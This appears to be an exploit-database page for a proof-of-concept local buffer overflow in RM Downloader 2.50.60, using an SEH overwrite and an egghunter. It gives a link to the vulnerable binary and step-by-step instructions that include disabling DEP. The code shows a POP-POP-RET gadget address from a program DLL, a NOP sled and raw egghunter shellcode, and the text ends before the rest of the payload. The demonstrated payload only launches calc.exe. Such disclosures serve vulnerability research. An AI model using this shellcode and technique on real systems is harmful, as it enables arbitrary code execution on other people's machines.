Exploits / Vulnerability Discovered : 2020-07-01 |
Type : local |
Platform : windows
This exploit / vulnerability Rm downloader 2.50.60 2006.06.23 load local buffer overflow (egghunter) (seh) (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-29
# Vulnerable Software: RM Downloader
# Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe
# Version: 2.50.60 2006.06.23
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
# Proof of Concept:
# 1.- Run the python script, it will create a new file "RM_LCE.txt"
# 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard
# 3.- Turn off DEP for RMDownloader.exe
# 4.- Open 'RMDownloader.exe'
# 5.- Go to 'Load' tab
# 6.- Paste clipboard in 'Load' parameter
# 7.- Click on button 'OK'
# 8.- Two messageboxes will pop up, click OK
# 9.- Calc.exe runs.
#1002C531 5B POP EBX
#1002C532 58 POP EAX
#1002C533 C3 RETN
#C:\Program Files\RM Downloader\RDutility02.dll
seh="\x31\xc5\x02\x10"
nops="\x90" * 20
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter += "\x77\x30\x30\x74" # this is the marker/tag: w00t
egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"